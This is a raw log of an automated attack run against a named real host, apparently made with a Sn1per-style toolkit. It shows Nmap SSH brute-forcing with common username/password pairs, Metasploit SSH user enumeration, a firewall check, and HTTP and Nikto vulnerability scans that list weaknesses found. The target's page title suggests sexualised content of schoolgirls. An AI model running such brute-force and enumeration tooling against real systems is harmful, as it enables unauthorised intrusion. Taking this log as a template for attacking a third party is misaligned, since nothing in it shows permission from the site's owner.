2967. NSE: [ssh-brute] Trying username/password pair: root:1234567
2968. NSE: [ssh-brute] Trying username/password pair: admin:1234567
2969. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
2970. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
2971. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
2972. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
2973. NSE: [ssh-brute] Trying username/password pair: guest:1234567
2974. NSE: [ssh-brute] Trying username/password pair: user:1234567
2975. NSE: [ssh-brute] Trying username/password pair: web:1234567
2976. NSE: [ssh-brute] Trying username/password pair: test:1234567
2977. NSE: [ssh-brute] Trying username/password pair: root:abc123
2978. NSE: [ssh-brute] Trying username/password pair: admin:abc123
2979. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
2980. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
2981. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
2982. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
2983. NSE: [ssh-brute] Trying username/password pair: guest:abc123
2984. NSE: [ssh-brute] Trying username/password pair: user:abc123
2985. NSE: [ssh-brute] Trying username/password pair: web:abc123
2986. NSE: [ssh-brute] Trying username/password pair: test:abc123
2987. NSE: [ssh-brute] Trying username/password pair: root:nicole
2988. NSE: [ssh-brute] Trying username/password pair: admin:nicole
2989. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
2990. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
2991. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
2992. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
2993. NSE: [ssh-brute] Trying username/password pair: guest:nicole
2994. NSE: [ssh-brute] Trying username/password pair: user:nicole
2995. NSE: [ssh-brute] Trying username/password pair: web:nicole
2996. NSE: [ssh-brute] Trying username/password pair: test:nicole
2997. NSE: [ssh-brute] Trying username/password pair: root:daniel
2998. NSE: [ssh-brute] Trying username/password pair: admin:daniel
2999. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
3000. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
3001. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
3002. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
3003. NSE: [ssh-brute] Trying username/password pair: guest:daniel
3004. NSE: [ssh-brute] Trying username/password pair: user:daniel
3005. NSE: [ssh-brute] Trying username/password pair: web:daniel
3006. NSE: [ssh-brute] Trying username/password pair: test:daniel
3007. NSE: [ssh-brute] Trying username/password pair: root:monkey
3008. NSE: [ssh-brute] Trying username/password pair: admin:monkey
3009. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
3010. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
3011. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
3012. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
3013. NSE: [ssh-brute] Trying username/password pair: guest:monkey
3014. NSE: [ssh-brute] Trying username/password pair: user:monkey
3015. NSE: [ssh-brute] Trying username/password pair: web:monkey
3016. NSE: [ssh-brute] Trying username/password pair: test:monkey
3017. NSE: [ssh-brute] Trying username/password pair: root:babygirl
3018. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
3019. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
3020. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
3021. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
3022. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
3023. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
3024. NSE: [ssh-brute] Trying username/password pair: user:babygirl
3025. NSE: [ssh-brute] Trying username/password pair: web:babygirl
3026. NSE: [ssh-brute] Trying username/password pair: test:babygirl
3027. NSE: [ssh-brute] Trying username/password pair: root:qwerty
3028. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
3029. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
3030. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
3031. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
3032. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
3033. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
3034. NSE: [ssh-brute] Trying username/password pair: user:qwerty
3035. NSE: [ssh-brute] Trying username/password pair: web:qwerty
3036. NSE: [ssh-brute] Trying username/password pair: test:qwerty
3037. NSE: [ssh-brute] Trying username/password pair: root:lovely
3038. NSE: [ssh-brute] Trying username/password pair: admin:lovely
3039. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
3040. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
3041. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
3042. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
3043. NSE: [ssh-brute] Trying username/password pair: guest:lovely
3044. NSE: [ssh-brute] Trying username/password pair: user:lovely
3045. NSE: [ssh-brute] Trying username/password pair: web:lovely
3046. NSE: [ssh-brute] Trying username/password pair: test:lovely
3047. NSE: [ssh-brute] Trying username/password pair: root:654321
3048. NSE: [ssh-brute] Trying username/password pair: admin:654321
3049. NSE: [ssh-brute] Trying username/password pair: administrator:654321
3050. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
3051. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
3052. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
3053. NSE: [ssh-brute] Trying username/password pair: guest:654321
3054. NSE: [ssh-brute] Trying username/password pair: user:654321
3055. NSE: [ssh-brute] Trying username/password pair: web:654321
3056. NSE: [ssh-brute] Trying username/password pair: test:654321
3057. NSE: [ssh-brute] Trying username/password pair: root:michael
3058. NSE: [ssh-brute] Trying username/password pair: admin:michael
3059. NSE: [ssh-brute] Trying username/password pair: administrator:michael
3060. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
3061. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
3062. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
3063. NSE: [ssh-brute] Trying username/password pair: guest:michael
3064. NSE: [ssh-brute] Trying username/password pair: user:michael
3065. NSE: [ssh-brute] Trying username/password pair: web:michael
3066. NSE: [ssh-brute] Trying username/password pair: test:michael
3067. NSE: [ssh-brute] Trying username/password pair: root:jessica
3068. NSE: [ssh-brute] Trying username/password pair: admin:jessica
3069. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
3070. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
3071. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
3072. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
3073. NSE: [ssh-brute] Trying username/password pair: guest:jessica
3074. NSE: [ssh-brute] Trying username/password pair: user:jessica
3075. NSE: [ssh-brute] Trying username/password pair: web:jessica
3076. NSE: [ssh-brute] Trying username/password pair: test:jessica
3077. NSE: [ssh-brute] Trying username/password pair: root:111111
3078. NSE: [ssh-brute] Trying username/password pair: admin:111111
3079. NSE: [ssh-brute] Trying username/password pair: administrator:111111
3080. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
3081. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
3082. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
3083. NSE: [ssh-brute] Trying username/password pair: guest:111111
3084. NSE: [ssh-brute] Trying username/password pair: user:111111
3085. NSE: [ssh-brute] Trying username/password pair: web:111111
3086. NSE: [ssh-brute] Trying username/password pair: test:111111
3087. NSE: [ssh-brute] Trying username/password pair: root:ashley
3088. NSE: [ssh-brute] Trying username/password pair: admin:ashley
3089. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
3090. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
3091. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
3092. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
3093. NSE: [ssh-brute] Trying username/password pair: guest:ashley
3094. NSE: [ssh-brute] Trying username/password pair: user:ashley
3095. NSE: [ssh-brute] Trying username/password pair: web:ashley
3096. NSE: [ssh-brute] Trying username/password pair: test:ashley
3097. NSE: [ssh-brute] Trying username/password pair: root:000000
3098. NSE: [ssh-brute] Trying username/password pair: admin:000000
3099. NSE: [ssh-brute] Trying username/password pair: administrator:000000
3100. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
3101. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
3102. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
3103. NSE: [ssh-brute] Trying username/password pair: guest:000000
3104. NSE: [ssh-brute] Trying username/password pair: user:000000
3105. NSE: [ssh-brute] Trying username/password pair: web:000000
3106. NSE: [ssh-brute] Trying username/password pair: test:000000
3107. NSE: [ssh-brute] Trying username/password pair: root:iloveu
3108. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
3109. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
3110. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
3111. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
3112. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
3113. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
3114. NSE: [ssh-brute] Trying username/password pair: user:iloveu
3115. NSE: [ssh-brute] Trying username/password pair: web:iloveu
3116. NSE: [ssh-brute] Trying username/password pair: test:iloveu
3117. NSE: [ssh-brute] Trying username/password pair: root:michelle
3118. NSE: [ssh-brute] Trying username/password pair: admin:michelle
3119. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
3120. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
3121. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
3122. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
3123. NSE: [ssh-brute] Trying username/password pair: guest:michelle
3124. NSE: [ssh-brute] Trying username/password pair: user:michelle
3125. NSE: [ssh-brute] Trying username/password pair: web:michelle
3126. NSE: [ssh-brute] Trying username/password pair: test:michelle
3127. NSE: [ssh-brute] Trying username/password pair: root:tigger
3128. NSE: [ssh-brute] Trying username/password pair: admin:tigger
3129. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
3130. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
3131. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
3132. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
3133. NSE: [ssh-brute] Trying username/password pair: guest:tigger
3134. NSE: [ssh-brute] Trying username/password pair: user:tigger
3135. NSE: [ssh-brute] Trying username/password pair: web:tigger
3136. NSE: [ssh-brute] Trying username/password pair: test:tigger
3137. NSE: [ssh-brute] Trying username/password pair: root:sunshine
3138. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
3139. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
3140. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
3141. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
3142. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
3143. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
3144. NSE: [ssh-brute] Trying username/password pair: user:sunshine
3145. NSE: [ssh-brute] Trying username/password pair: web:sunshine
3146. NSE: [ssh-brute] Trying username/password pair: test:sunshine
3147. NSE: [ssh-brute] Trying username/password pair: root:chocolate
3148. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
3149. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
3150. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
3151. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
3152. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
3153. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
3154. NSE: [ssh-brute] Trying username/password pair: user:chocolate
3155. NSE: [ssh-brute] Trying username/password pair: web:chocolate
3156. NSE: [ssh-brute] Trying username/password pair: test:chocolate
3157. NSE: [ssh-brute] Trying username/password pair: root:password1
3158. NSE: [ssh-brute] Trying username/password pair: admin:password1
3159. NSE: [ssh-brute] Trying username/password pair: administrator:password1
3160. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
3161. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
3162. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
3163. NSE: [ssh-brute] Trying username/password pair: guest:password1
3164. NSE: [ssh-brute] Trying username/password pair: user:password1
3165. NSE: [ssh-brute] Trying username/password pair: web:password1
3166. NSE: [ssh-brute] Trying username/password pair: test:password1
3167. NSE: [ssh-brute] Trying username/password pair: root:soccer
3168. NSE: [ssh-brute] Trying username/password pair: admin:soccer
3169. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
3170. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
3171. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
3172. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
3173. NSE: [ssh-brute] Trying username/password pair: guest:soccer
3174. NSE: [ssh-brute] Trying username/password pair: user:soccer
3175. NSE: [ssh-brute] Trying username/password pair: web:soccer
3176. NSE: [ssh-brute] Trying username/password pair: test:soccer
3177. NSE: [ssh-brute] Trying username/password pair: root:anthony
3178. NSE: [ssh-brute] Trying username/password pair: admin:anthony
3179. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
3180. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
3181. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
3182. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
3183. NSE: [ssh-brute] Trying username/password pair: guest:anthony
3184. NSE: [ssh-brute] Trying username/password pair: user:anthony
3185. NSE: [ssh-brute] Trying username/password pair: web:anthony
3186. NSE: [ssh-brute] Trying username/password pair: test:anthony
3187. NSE: [ssh-brute] Trying username/password pair: root:friends
3188. NSE: [ssh-brute] Trying username/password pair: admin:friends
3189. NSE: [ssh-brute] Trying username/password pair: administrator:friends
3190. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
3191. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
3192. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
3193. NSE: [ssh-brute] Trying username/password pair: guest:friends
3194. NSE: [ssh-brute] Trying username/password pair: user:friends
3195. NSE: [ssh-brute] Trying username/password pair: web:friends
3196. NSE: [ssh-brute] Trying username/password pair: test:friends
3197. NSE: [ssh-brute] Trying username/password pair: root:purple
3198. NSE: [ssh-brute] Trying username/password pair: admin:purple
3199. NSE: [ssh-brute] Trying username/password pair: administrator:purple
3200. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
3201. NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
3202. NSE: [ssh-brute] Trying username/password pair: netadmin:purple
3203. NSE: [ssh-brute] Trying username/password pair: guest:purple
3204. NSE: [ssh-brute] Trying username/password pair: user:purple
3205. NSE: [ssh-brute] Trying username/password pair: web:purple
3206. NSE: [ssh-brute] Trying username/password pair: test:purple
3207. NSE: [ssh-brute] Trying username/password pair: root:angel
3208. NSE: [ssh-brute] Trying username/password pair: admin:angel
3209. NSE: [ssh-brute] Trying username/password pair: administrator:angel
3210. NSE: [ssh-brute] Trying username/password pair: webadmin:angel
3211. NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
3212. NSE: [ssh-brute] Trying username/password pair: netadmin:angel
3213. NSE: [ssh-brute] Trying username/password pair: guest:angel
3214. NSE: [ssh-brute] Trying username/password pair: user:angel
3215. NSE: [ssh-brute] Trying username/password pair: web:angel
3216. NSE: [ssh-brute] Trying username/password pair: test:angel
3217. NSE: [ssh-brute] Trying username/password pair: root:butterfly
3218. NSE: [ssh-brute] Trying username/password pair: admin:butterfly
3219. NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
3220. NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
3221. NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
3222. NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
3223. NSE: [ssh-brute] Trying username/password pair: guest:butterfly
3224. NSE: [ssh-brute] Trying username/password pair: user:butterfly
3225. NSE: [ssh-brute] Trying username/password pair: web:butterfly
3226. NSE: [ssh-brute] Trying username/password pair: test:butterfly
3227. NSE: [ssh-brute] Trying username/password pair: root:jordan
3228. NSE: [ssh-brute] Trying username/password pair: admin:jordan
3229. NSE: [ssh-brute] Trying username/password pair: administrator:jordan
3230. NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
3231. NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
3232. NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
3233. Nmap scan report for video1.school-models.net (45.123.190.187)
3234. Host is up (0.20s latency).
3235.  
3236. PORT STATE SERVICE VERSION
3237. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
3238. | ssh-auth-methods:
3239. | Supported authentication methods:
3240. | publickey
3241. | gssapi-keyex
3242. | gssapi-with-mic
3243. |_ password
3244. | ssh-brute:
3245. | Accounts: No valid accounts found
3246. |_ Statistics: Performed 356 guesses in 181 seconds, average tps: 2.2
3247. | ssh-hostkey:
3248. | 1024 e5:f9:0b:6f:d8:5a:5e:ac:40:3b:a8:d1:9a:b4:f1:0c (DSA)
3249. |_ 2048 b2:cb:dc:52:94:8e:52:a9:f9:c4:bf:f7:5a:f3:77:0d (RSA)
3250. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
3251. |_ssh-run: Failed to specify credentials and command to run.
3252. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3253. Aggressive OS guesses: Linux 2.6.39 (95%), Linux 2.6.32 (94%), Linux 2.6.32 or 3.10 (94%), WatchGuard Fireware 11.8 (94%), Linux 2.6.18 - 2.6.22 (94%), Synology DiskStation Manager 5.1 (94%), Linux 3.1 - 3.2 (93%), Linux 3.4 (93%), Linux 3.10 (92%), Linux 2.6.32 - 2.6.39 (92%)
3254. No exact OS matches for host (test conditions non-ideal).
3255. Network Distance: 11 hops
3256.  
3257. TRACEROUTE (using port 22/tcp)
3258. HOP RTT ADDRESS
3259. 1 110.45 ms 10.13.0.1
3260. 2 ...
3261. 3 111.50 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
3262. 4 ...
3263. 5 117.73 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
3264. 6 139.96 ms be100-1167.var-5-a9.pl.eu (91.121.215.193)
3265. 7 140.19 ms vl2.var-6-a72.pl.eu (91.121.215.209)
3266. 8 ... 9
3267. 10 198.28 ms ddos-guard.net (185.129.101.85)
3268. 11 197.36 ms 45.123.190.187
3269.  
3270. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3271. Nmap done: 1 IP address (1 host up) scanned in 208.51 seconds
3272.  
3273.  
3274. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
3275. MMMMMMMMMMM MMMMMMMMMM
3276. MMMN$ vMMMM
3277. MMMNl MMMMM MMMMM JMMMM
3278. MMMNl MMMMMMMN NMMMMMMM JMMMM
3279. MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
3280. MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
3281. MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
3282. MMMNI MMMMM MMMMMMM MMMMM jMMMM
3283. MMMNI MMMMM MMMMMMM MMMMM jMMMM
3284. MMMNI MMMNM MMMMMMM MMMMM jMMMM
3285. MMMNI WMMMM MMMMMMM MMMM# JMMMM
3286. MMMMR ?MMNM MMMMM .dMMMM
3287. MMMMNm `?MMM MMMM` dMMMMM
3288. MMMMMMN ?MM MM? NMMMMMN
3289. MMMMMMMMNe JMMMMMNMMM
3290. MMMMMMMMMMNm, eMMMMMNMMNMM
3291. MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
3292. MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
3293. https://metasploit.com
3294.  
3295.  
3296. =[ metasploit v4.16.8-dev ]
3297. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
3298. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
3299. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
3300.  
3301. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
3302. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
3303. [-] Unknown command: “spool.
3304. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
3305. RHOSTS => video1.school-models.net
3306. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
3307. RHOST => video1.school-models.net
3308. [*] 45.123.190.187:22 - SSH - Checking for false positives
3309. [*] 45.123.190.187:22 - SSH - Starting scan
3310. [-] 45.123.190.187:22 - SSH - User 'admin' not found
3311. [-] 45.123.190.187:22 - SSH - User 'administrator' not found
3312. [-] 45.123.190.187:22 - SSH - User 'anonymous' not found
3313. [-] 45.123.190.187:22 - SSH - User 'backup' not found
3314. [-] 45.123.190.187:22 - SSH - User 'bee' not found
3315. [-] 45.123.190.187:22 - SSH - User 'ftp' not found
3316. [-] 45.123.190.187:22 - SSH - User 'guest' not found
3317. [-] 45.123.190.187:22 - SSH - User 'GUEST' not found
3318. [-] 45.123.190.187:22 - SSH - User 'info' not found
3319. [-] 45.123.190.187:22 - SSH - User 'mail' not found
3320. [-] 45.123.190.187:22 - SSH - User 'mailadmin' not found
3321. [-] 45.123.190.187:22 - SSH - User 'msfadmin' not found
3322. [-] 45.123.190.187:22 - SSH - User 'mysql' not found
3323. [-] 45.123.190.187:22 - SSH - User 'nobody' not found
3324. [-] 45.123.190.187:22 - SSH - User 'oracle' not found
3325. [-] 45.123.190.187:22 - SSH - User 'owaspbwa' not found
3326. [-] 45.123.190.187:22 - SSH - User 'postfix' not found
3327. [-] 45.123.190.187:22 - SSH - User 'postgres' not found
3328. [-] 45.123.190.187:22 - SSH - User 'private' not found
3329. [-] 45.123.190.187:22 - SSH - User 'proftpd' not found
3330. [-] 45.123.190.187:22 - SSH - User 'public' not found
3331. [-] 45.123.190.187:22 - SSH - User 'root' not found
3332. [-] 45.123.190.187:22 - SSH - User 'superadmin' not found
3333. [-] 45.123.190.187:22 - SSH - User 'support' not found
3334. [-] 45.123.190.187:22 - SSH - User 'sys' not found
3335. [-] 45.123.190.187:22 - SSH - User 'system' not found
3336. [-] 45.123.190.187:22 - SSH - User 'systemadmin' not found
3337. [-] 45.123.190.187:22 - SSH - User 'systemadministrator' not found
3338. [-] 45.123.190.187:22 - SSH - User 'test' not found
3339. [-] 45.123.190.187:22 - SSH - User 'tomcat' not found
3340. [-] 45.123.190.187:22 - SSH - User 'user' not found
3341. [-] 45.123.190.187:22 - SSH - User 'webmaster' not found
3342. [-] 45.123.190.187:22 - SSH - User 'www-data' not found
3343. [-] 45.123.190.187:22 - SSH - User 'Fortimanager_Access' not found
3344. [*] Scanned 1 of 1 hosts (100% complete)
3345. [*] Auxiliary module execution completed
3346. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
3347. [+] 45.123.190.187:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
3348. [*] video1.school-models.net:22 - Scanned 1 of 1 hosts (100% complete)
3349. [*] Auxiliary module execution completed
3350. + -- --=[Port 23 closed... skipping.
3351. + -- --=[Port 25 closed... skipping.
3352. + -- --=[Port 53 closed... skipping.
3353. + -- --=[Port 79 closed... skipping.
3354. + -- --=[Port 80 opened... running tests...
3355. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
3356.  
3357. ^ ^
3358. _ __ _ ____ _ __ _ _ ____
3359. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
3360. | V V // o // _/ | V V // 0 // 0 // _/
3361. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
3362. <
3363. ...'
3364.  
3365. WAFW00F - Web Application Firewall Detection Tool
3366.  
3367. By Sandro Gauci && Wendel G. Henrique
3368.  
3369. Checking http://video1.school-models.net
3370. Generic Detection results:
3371. The site http://video1.school-models.net seems to be behind a WAF or some sort of security solution
3372. Reason: Blocking is being done at connection/packet level.
3373. Number of requests: 12
3374.  
3375. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
3376. http://video1.school-models.net [200 OK] HTTPServer[nginx/1.10.2], IP[45.123.190.187], JQuery[1.7.1], Script[JavaScript], Title[SCHOOL MODELS|ORIENTAL SCHOOLGIRLS NONUDE| SCHOOL MODELS VIDEO ISSUE 1], nginx[1.10.2]
3377.  
3378. __ ______ _____
3379. \ \/ / ___|_ _|
3380. \ /\___ \ | |
3381. / \ ___) || |
3382. /_/\_|____/ |_|
3383.  
3384. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
3385. + -- --=[Target: video1.school-models.net:80
3386. + -- --=[Site not vulnerable to Cross-Site Tracing!
3387. + -- --=[Site not vulnerable to Host Header Injection!
3388. + -- --=[Site vulnerable to Cross-Frame Scripting!
3389. + -- --=[Site vulnerable to Clickjacking!
3390.  
3391. HTTP/1.1 405 Not Allowed
3392. Server: nginx/1.10.2
3393. Date: Sun, 01 Oct 2017 21:24:14 GMT
3394. Content-Type: text/html
3395. Content-Length: 173
3396. Connection: close
3397.  
3398. <html>
3399. <head><title>405 Not Allowed</title></head>
3400. <body bgcolor="white">
3401. <center><h1>405 Not Allowed</h1></center>
3402. <hr><center>nginx/1.10.2</center>
3403. </body>
3404. </html>
3405.  
3406. HTTP/1.1 200 OK
3407. Server: nginx/1.10.2
3408. Date: Sun, 01 Oct 2017 21:24:15 GMT
3409. Content-Type: text/html; charset=UTF-8
3410. Content-Length: 13395
3411. Connection: keep-alive
3412. Last-Modified: Sat, 07 Nov 2015 09:35:35 GMT
3413. ETag: "3453-523f0150007c0"
3414. Accept-Ranges: bytes
3415.  
3416. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
3417. "http://www.w3.org/TR/html4/loose.dtd">
3418. <html>
3419. <head>
3420. <title>SCHOOL MODELS|ORIENTAL SCHOOLGIRLS NONUDE| SCHOOL MODELS VIDEO ISSUE 1</title>
3421. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
3422. <script src="js/jquery-1.7.1.min.js"></script>
3423. <script>
3424. $.getJSON("http://jsonip.com?callback=?", function (data) {
3425. $.get( "http://stats.bulkfilms.net/to_face.php", { refer: document.referrer, time: Math.floor(Date.now() / 1000), ip: data.ip, to_pl: document.location.href } );
3426. });
3427. </script>
3428. <style type="text/css">
3429. <!--
3430. body {
3431. margin-left: -1px;
3432. margin-top: -1px;
3433. background-color: #e69e20;
3434. }
3435. .style1 {
3436. color: #AC2068;
3437. font-weight: bold;
3438. font-family: Ve
3439.  
3440.  
3441.  
3442. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
3443. + -- --=[Checking if X-Content options are enabled on video1.school-models.net...
3444.  
3445. + -- --=[Checking if X-Frame options are enabled on video1.school-models.net...
3446.  
3447. + -- --=[Checking if X-XSS-Protection header is enabled on video1.school-models.net...
3448.  
3449. + -- --=[Checking HTTP methods on video1.school-models.net...
3450. Allow: GET,HEAD,POST,OPTIONS,TRACE
3451.  
3452. + -- --=[Checking if TRACE method is enabled on video1.school-models.net...
3453.  
3454. + -- --=[Checking for META tags on video1.school-models.net...
3455. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
3456.  
3457. + -- --=[Checking for open proxy on video1.school-models.net...
3458. <html>
3459. <head><title>502 Bad Gateway</title></head>
3460. <body bgcolor="white">
3461. <center><h1>502 Bad Gateway</h1></center>
3462. <hr><center>nginx/1.10.2</center>
3463. </body>
3464. </html>
3465.  
3466. + -- --=[Enumerating software on video1.school-models.net...
3467. Server: nginx/1.10.2
3468.  
3469. + -- --=[Checking if Strict-Transport-Security is enabled on video1.school-models.net...
3470.  
3471. + -- --=[Checking for Flash cross-domain policy on video1.school-models.net...
3472. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3473. <html><head>
3474. <title>404 Not Found</title>
3475. </head><body>
3476. <h1>Not Found</h1>
3477. <p>The requested URL /crossdomain.xml was not found on this server.</p>
3478. </body></html>
3479.  
3480. + -- --=[Checking for Silverlight cross-domain policy on video1.school-models.net...
3481. <html>
3482. <head><title>502 Bad Gateway</title></head>
3483. <body bgcolor="white">
3484. <center><h1>502 Bad Gateway</h1></center>
3485. <hr><center>nginx/1.10.2</center>
3486. </body>
3487. </html>
3488.  
3489. + -- --=[Checking for HTML5 cross-origin resource sharing on video1.school-models.net...
3490.  
3491. + -- --=[Retrieving robots.txt on video1.school-models.net...
3492. # vestacp autogenerated robots.txt
3493. User-agent: *
3494. Crawl-delay: 10
3495.  
3496. + -- --=[Retrieving sitemap.xml on video1.school-models.net...
3497. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3498. <html><head>
3499. <title>404 Not Found</title>
3500. </head><body>
3501. <h1>Not Found</h1>
3502. <p>The requested URL /sitemap.xml was not found on this server.</p>
3503. </body></html>
3504.  
3505. + -- --=[Checking cookie attributes on video1.school-models.net...
3506.  
3507. + -- --=[Checking for ASP.NET Detailed Errors on video1.school-models.net...
3508.  
3509.  
3510. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
3511. - Nikto v2.1.6
3512. ---------------------------------------------------------------------------
3513. + Target IP: 45.123.190.187
3514. + Target Hostname: video1.school-models.net
3515. + Target Port: 80
3516. + Start Time: 2017-10-01 20:30:25 (GMT-4)
3517. ---------------------------------------------------------------------------
3518. + Server: nginx/1.10.2
3519. + Server leaks inodes via ETags, header found with file /, fields: 0x3453 0x523f0150007c0
3520. + The anti-clickjacking X-Frame-Options header is not present.
